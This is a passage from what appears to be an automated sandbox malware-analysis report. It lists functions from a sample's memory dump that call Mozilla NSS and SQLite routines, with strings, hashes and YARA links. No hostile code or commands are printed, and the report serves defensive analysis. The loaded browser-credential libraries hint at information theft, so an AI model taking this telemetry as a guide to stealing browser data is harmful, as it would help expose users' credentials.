
PR_Now.NSS3(?,00000000,?), ref: 6CF64D26

Part of subcall function 6D009DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DC6
Part of subcall function 6D009DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DD1
Part of subcall function 6D009DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D009DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6CF64D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CF64DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CF64E02

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 379268d7d67561a62e58bec2d64e7cc78b3ee0511f0bd8a6f8a46e7d73bc425f
Instruction ID: fa2aad2b2c48b1c4ad89f769a99c68f83c4f3d090ec97fcdd2378145765b31cc
Opcode Fuzzy Hash: 379268d7d67561a62e58bec2d64e7cc78b3ee0511f0bd8a6f8a46e7d73bc425f
Instruction Fuzzy Hash: 3541A5B6D00605ABEB01AF25EC54B9A7BB8BF1525DF054170ED0887F12EB31D929C7E2

Function 6CF2FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CF2FD18
sqlite3_initialize.NSS3 ref: 6CF2FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF2FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CF2FD99
sqlite3_free.NSS3(00000000), ref: 6CF2FE3C
sqlite3_free.NSS3(?), ref: 6CF2FEE3
sqlite3_free.NSS3(?), ref: 6CF2FEEE

Strings

simple, xrefs: 6CF2FC79

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 72efaff43dbd9d93b98720c78c3b0911e9282a801b0ab20c445a7e2e9ca60a07
Instruction ID: bfda67f22da99fd39d3d94d407a9f29fb6fb0f4fd919f4fdadff4ffb2dc9922a
Opcode Fuzzy Hash: 72efaff43dbd9d93b98720c78c3b0911e9282a801b0ab20c445a7e2e9ca60a07
Instruction Fuzzy Hash: 0F91A0B0A116168FDB44CFA5C980BAAB7F1FF84318F24C16CD8199B752E739E901CB90

Function 6CF35CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF35EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF35EED

Strings

%s at line %d of [%.10s], xrefs: 6CF35EE0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF35ED1
invalid, xrefs: 6CF35EBE
unable to close due to unfinalized statements or unfinished backups, xrefs: 6CF35E64
misuse, xrefs: 6CF35EDB
API call with %s database connection pointer, xrefs: 6CF35EC3

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 09b36ca3fbdd4de0c37f38db94661f3b1c5e77c4bff92ac26923a990dd45e3d1
Instruction ID: 3cc05795056460b71ae533097e6c7e3a3b56b16b5b5a69657068bec56f4da52b
Opcode Fuzzy Hash: 09b36ca3fbdd4de0c37f38db94661f3b1c5e77c4bff92ac26923a990dd45e3d1
Instruction Fuzzy Hash: C181B471B09621ABEB1ACF65C844BAA7770BFC1308F29125DD81D5BB91D730E842CBD1

Function 6CF1DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF1DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF1DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF1DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF1DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF1DF78

Strings

%s at line %d of [%.10s], xrefs: 6CF1DE61, 6CF1DE90
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF1DE52, 6CF1DE81
database corruption, xrefs: 6CF1DE5C, 6CF1DE8B

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 961cdd68992ff1364a16ccb49f39a4e8f765ed703e5bb21ee1db4c921581de6e
Instruction ID: f4b0191ffd1a65b1ad400c75b6efa2a2f46969becd0dfb763d7f511e948a5734
Opcode Fuzzy Hash: 961cdd68992ff1364a16ccb49f39a4e8f765ed703e5bb21ee1db4c921581de6e
Instruction Fuzzy Hash: CF81B071608700AFD715CF25C880B6B77F1BF85308F15882DE99A8BE92EB31E845CB52

Function 6CECCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CECB999), ref: 6CECCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CECB999), ref: 6CECD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CECB999), ref: 6CECD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CECB999), ref: 6D01972B

Strings

%s at line %d of [%.10s], xrefs: 6CECCFEC, 6CECD018, 6CECD029, 6CECD03F, 6D01978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECCFDD, 6CECD00E, 6CECD022, 6CECD033, 6D019780
database corruption, xrefs: 6CECCFE7, 6CECD013, 6CECD028, 6CECD039, 6CECD03E, 6D019786

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 9ed379d60a3dd8ee14770dc182dd27809d2191d457eb7b93da59233af0311d18
Instruction ID: 5cab3dda3424b29fe975275eef6f36b628975a970e14922d63bc823f1cad3441
Opcode Fuzzy Hash: 9ed379d60a3dd8ee14770dc182dd27809d2191d457eb7b93da59233af0311d18
Instruction Fuzzy Hash: BC615871A042508BE310CF69C941BA7B7F6EF85318F28426DE4599F782D376D847C7A2

Function 6CF8CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CF8CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CF8CE16
PR_SetError.NSS3(00000000,00000000), ref: 6CF8D079

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: f688729ed588a8473b60f8dc01811a37448606b0358a0c7ffe0b86889b67457e
Instruction ID: 9d1eb095caf42eed94a585e0005f58a0fa472a15624ccff98d79a30a59b26bff
Opcode Fuzzy Hash: f688729ed588a8473b60f8dc01811a37448606b0358a0c7ffe0b86889b67457e
Instruction Fuzzy Hash: BFC18DB1A012199BDB20DF24CC84BDAB7B4BF48318F1442A9E94CA7741E775EE95CF90

Function 6CF7DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CF897C1,?,00000000,00000000,?,?,?,00000000,?,6CF67F4A,00000000), ref: 6CF7DC68

Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CF67F4A,00000000,?,00000000,00000000), ref: 6CF7DFAA

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 5ebe448a0e2e2a66795d6378a426aacb8a068a1e0f63eb14a57c865f058c5040
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: BC81B4716066058BFF364B59F8A03EA7296DB60348FA0843BD95ACAFE1D774D484C732

Function 6CF53C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CF53C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6CF53C94

Part of subcall function 6CF495B0: TlsGetValue.KERNEL32(00000000,?,6CF600D2,00000000), ref: 6CF495D2
Part of subcall function 6CF495B0: EnterCriticalSection.KERNEL32(?,?,?,6CF600D2,00000000), ref: 6CF495E7
Part of subcall function 6CF495B0: PR_Unlock.NSS3(?,?,?,?,6CF600D2,00000000), ref: 6CF49605

PORT_NewArena_Util.NSS3(00000800), ref: 6CF53CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CF53CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CF53CE1

Part of subcall function 6CF53090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CF6AE42), ref: 6CF530AA
Part of subcall function 6CF53090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CF530C7
Part of subcall function 6CF53090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CF530E5
Part of subcall function 6CF53090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CF53116
Part of subcall function 6CF53090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CF5312B
Part of subcall function 6CF53090: PK11_DestroyObject.NSS3(?,?), ref: 6CF53154
Part of subcall function 6CF53090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF5317E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: decf7652e4096d46fed1bfd554b04b3f5f57a9a6cc62e1d82b003944be69301f
Instruction ID: 7948dc9e5fed5e321c0e58a0e53936eac9515ddb1a7fa0a4d505b06dde376485
Opcode Fuzzy Hash: decf7652e4096d46fed1bfd554b04b3f5f57a9a6cc62e1d82b003944be69301f
Instruction Fuzzy Hash: 0461C675A00200ABEB105F69DC45FAB76F9EF14748F488128FF469BA52F721D92CC7A1

Function 6CF93D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6CF93440: PK11_GetAllTokens.NSS3 ref: 6CF93481
Part of subcall function 6CF93440: PR_SetError.NSS3(00000000,00000000), ref: 6CF934A3
Part of subcall function 6CF93440: TlsGetValue.KERNEL32 ref: 6CF9352E
Part of subcall function 6CF93440: EnterCriticalSection.KERNEL32(?), ref: 6CF93542
Part of subcall function 6CF93440: PR_Unlock.NSS3(?), ref: 6CF9355B

TlsGetValue.KERNEL32 ref: 6CF93D8B
EnterCriticalSection.KERNEL32(?), ref: 6CF93D9F
PR_Unlock.NSS3(?), ref: 6CF93DCA
PR_SetError.NSS3(00000000,00000000), ref: 6CF93DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CF93E4F

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

TlsGetValue.KERNEL32 ref: 6CF93E97
EnterCriticalSection.KERNEL32(?), ref: 6CF93EAB
PR_Unlock.NSS3(?), ref: 6CF93ED6
PR_SetError.NSS3(00000000,00000000), ref: 6CF93EEE

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: b54e1eff166a2f9ba04ae99f1197dd6012c65dd5c1718b969b6ae068d6a07b2f
Instruction ID: c1fa5dac97055d288f2736d7b0b8376170c22aa786efc89432ee78aaaa265134
Opcode Fuzzy Hash: b54e1eff166a2f9ba04ae99f1197dd6012c65dd5c1718b969b6ae068d6a07b2f
Instruction Fuzzy Hash: 50510676D006019FEF116F69D844BAB77B4AF45318F050129EE0D8BA22EB31E95CC7D1

Function 6CF42C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(453359D0), ref: 6CF42C5D

Part of subcall function 6CFA0D30: calloc.MOZGLUE ref: 6CFA0D50
Part of subcall function 6CFA0D30: TlsGetValue.KERNEL32 ref: 6CFA0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CF42C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF42CE0

Part of subcall function 6CF42E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CF42CDA,?,00000000), ref: 6CF42E1E
Part of subcall function 6CF42E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CF42E33
Part of subcall function 6CF42E00: TlsGetValue.KERNEL32 ref: 6CF42E4E
Part of subcall function 6CF42E00: EnterCriticalSection.KERNEL32(?), ref: 6CF42E5E
Part of subcall function 6CF42E00: PL_HashTableLookup.NSS3(?), ref: 6CF42E71
Part of subcall function 6CF42E00: PL_HashTableRemove.NSS3(?), ref: 6CF42E84
Part of subcall function 6CF42E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CF42E96
Part of subcall function 6CF42E00: PR_Unlock.NSS3 ref: 6CF42EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF42D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CF42D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CF42D3F
free.MOZGLUE(00000000), ref: 6CF42D73
CERT_DestroyCertificate.NSS3(?), ref: 6CF42DB8
free.MOZGLUE ref: 6CF42DC8

Part of subcall function 6CF43E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF43EC2
Part of subcall function 6CF43E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CF43ED6
Part of subcall function 6CF43E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CF43EEE
Part of subcall function 6CF43E60: PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CF43F02
Part of subcall function 6CF43E60: PL_FreeArenaPool.NSS3 ref: 6CF43F14
Part of subcall function 6CF43E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF43F27

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: add5efa1d14385cbb40eb37723861068d473d202257b9786636e868f6ad15459
Instruction ID: d801b859d752a52e964bb4b67126e67a0be1007a833739c2ff00a7c8f040b014
Opcode Fuzzy Hash: add5efa1d14385cbb40eb37723861068d473d202257b9786636e868f6ad15459
Instruction Fuzzy Hash: 2251DF72A042119BEB01DF29DC88B5B7BF5EF88318F158438ED55C7652EB32E8158B92

Function 6CF47CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF440D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CF43F7F,?,00000055,?,?,6CF41666,?,?), ref: 6CF440D9
Part of subcall function 6CF440D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CF41666,?,?), ref: 6CF440FC
Part of subcall function 6CF440D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CF41666,?,?), ref: 6CF44138

PR_GetCurrentThread.NSS3 ref: 6CF47CFD

Part of subcall function 6D009BF0: TlsGetValue.KERNEL32(?,?,?,6D050A75), ref: 6D009C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6D069030), ref: 6CF47D1B

Part of subcall function 6CF9FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CF41A3E,00000048,00000054), ref: 6CF9FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6D069048), ref: 6CF47D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CF47D50
PR_GetCurrentThread.NSS3 ref: 6CF47D61
PORT_ArenaMark_Util.NSS3(?), ref: 6CF47D7D
free.MOZGLUE(?), ref: 6CF47D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CF47DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CF47E19

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 2f0ce6e002a394dabf79362d71af16342db7679da730aa9aa0846db88a75c140
Instruction ID: ee0c249c2700fce4da8ada6959d4a06c66fd175fa1a81dc3c7f71d843a1bf7f9
Opcode Fuzzy Hash: 2f0ce6e002a394dabf79362d71af16342db7679da730aa9aa0846db88a75c140
